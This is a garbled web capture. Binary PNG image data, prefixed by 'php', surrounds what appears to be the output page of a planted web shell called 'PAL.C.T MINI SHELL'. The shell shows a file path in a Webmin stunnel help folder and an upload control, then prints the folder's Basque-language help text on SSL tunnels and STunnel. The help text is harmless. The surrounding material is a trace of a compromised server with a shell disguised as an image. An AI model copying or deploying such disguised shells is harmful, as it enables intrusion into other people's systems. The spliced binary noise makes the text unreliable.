php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.eu.auto.html

<header> SSL tuneletarako sarrera </header> SSL datuak TCP konexio batean zifratzeko protokoloa da sarean zehar bidaiatzen duen bitartean. Hasieran garatu zen web arakatzaileen eta zerbitzarien arteko trafikoa babesteko, baina normalean TCP protokoloaren bidez bidaliko lituzkeen edozein fluxu mota zifratzeko erabil daiteke. <p> SSL protokoloak bezeroei eta zerbitzariei beren burua autentikatzeko aukera ematen die, bezeroak ziur dagoela uste duen ostalariarekin konektatzen dela ziur egon dadin. Bezeroak aitortutako ziurtagiri-agintari batek emandako ziurtagiriak erabiliz egiten da (egiaztatu ahal izateko) eta ostalari-izen jakin bati lotuta. Ziurtagiriak gabe, erasotzaileak SSL konexio bat berriro zuzendu lezake bere zerbitzarira eta informazio sentikorra har dezake zerbitzari errealarekin hitz egiten ari dela uste duen bezero batek. <p> Zifratu gabeko Internet bidez bidaiatzen duen edozein datu erasotzaileak harrapatu eta irakurri dezake igarotzen duen sareetako batean sartzeko. LAN batean bezeroaren eta zerbitzariaren sistemaren artean bidaiatutako datuak erraz entzuten dira. Telnet, FTP edo POP3 zerbitzarira konektatzean zure pasahitza sarean bidaltzen da eta, beraz, erasotzaile batek harrapatu dezake. <p> SSL egoera mota hauetan datuak babesteko erabil daiteke, baina bezeroak eta zerbitzariak onartzen badute bakarrik. Web arakatzaile eta posta bezero gehienek SSL enkriptatutako HTTP, POP3 eta IMAP konexioak egin ditzakete, baina web eta POP3 zerbitzari guztiek ezin dituzte onartu. POP3 bereziki zaila da babesten, Unix sistema gehienekin datorren zerbitzari estandarrak SSL ez baitu batere onartzen. Zorionez irtenbidea badago ere - STunnel. <p> STunnel enkriptatutako konexioa SSL enkriptatutako bihurtzen duen programa erraza da. Inetd edo xinetd bezalako super-zerbitzari batetik exekutatu ohi da eta gero SSL onartzen ez duen POP3 zerbitzaria bezalako beste programaren bat exekutatu behar da. Diseinu honek inetd-tik exekutatzen den edozein zerbitzari babestea ahalbidetzen du, telnet, NNTP eta IMAP zerbitzarietatik. <p> Zerbitzari guztiak ez dira zifratze osoz babestuta egon, bezeroak ez baitago SSL moduan erabiltzeko. Adibidez, ez dut sekula SSL erabili dezakeen telnet edo FTP bezero baten berririk, SSH pakete arruntak dagoeneko enkriptatutako saioak eta fitxategien transferentziak baimentzen baititu. <p> Webmin moduluak errazten du STunnel exekutatzen duten super zerbitzari zerbitzuak zerbitzari programaren bat abiarazteko. Internet Zerbitzuen modulua eskuz egin daitekeen arren, berariaz STunnel konfiguratzeko eta konfiguratzeko diseinatuta dago. Inetd eta / edo xinetd instalatuta dituzun ala ez hautematen du automatikoki, haien konfigurazioak irakurtzen ditu lehendik dauden SSL tunelak ikusteko eta gehitzen zaizkio tunel berria sortzen duzunean. Biak instalatuta badaude, SSL tunel berriak xinetd konfigurazioari gehitzen zaizkio, nire ustez, bien arteko gorena baita. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`